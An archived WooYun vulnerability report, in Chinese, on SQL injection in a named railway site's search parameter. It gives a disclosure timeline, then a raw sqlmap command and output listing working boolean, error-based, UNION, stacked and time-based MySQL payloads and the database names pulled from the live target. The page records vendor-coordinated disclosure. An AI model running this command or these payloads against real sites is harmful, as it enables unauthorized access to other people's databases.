乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-07: 细节已通知厂商并且等待厂商处理中 2015-01-07: 厂商已经确认,细节仅向厂商公开 2015-01-17: 细节向核心白帽子及相关领域专家公开 2015-01-27: 细节向普通白帽子公开 2015-02-06: 细节向实习白帽子公开 2015-02-21: 细节向公众公开
RT
[root@Hacker~]# Sqlmap sqlmap -u "http://www.cd-rail.com/RailWay/Search?s=aa" -v 1 --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o[*] starting at 10:08:58[10:08:58] [INFO] resuming back-end DBMS 'mysql'[10:08:59] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: s Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=aa%' AND 9319=9319 AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: s=aa%' AND (SELECT 6109 FROM(SELECT COUNT(*),CONCAT(0x71796a6271,(SELECT (CASE WHEN (6109=6109) THEN 1 ELSE 0 END)),0x7162707371 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: s=aa%' UNION ALL SELECT CONCAT(0x71796a6271,0x425a466d7143544d6857,0x7162707371),95,95,95,95# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: s=aa%'; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: s=aa%' AND SLEEP(5) AND '%'='---[10:08:59] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0[10:08:59] [INFO] fetching database names[10:08:59] [WARNING] reflective value(s) found and filtering out[10:08:59] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Fal[10:09:00] [WARNING] the SQL query provided does not return any output[10:09:00] [INFO] the SQL query used returns 4 entries[10:09:00] [INFO] resumed: information_schema[10:09:00] [INFO] resumed: mysql[10:09:00] [INFO] resumed: performance_schema[10:09:00] [INFO] resumed: roadwayavailable databases [4]:[*] information_schema[*] mysql[*] performance_schema[*] roadway[10:09:00] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha[10:09:00] [INFO] fetched data logged to text files under 'E:\360?~1\SQLMAP~1.4\Bin\output\www.cd-rail.com'
null
危害等级:中
漏洞Rank:6
确认时间:2015-01-07 15:37
正在修复
暂无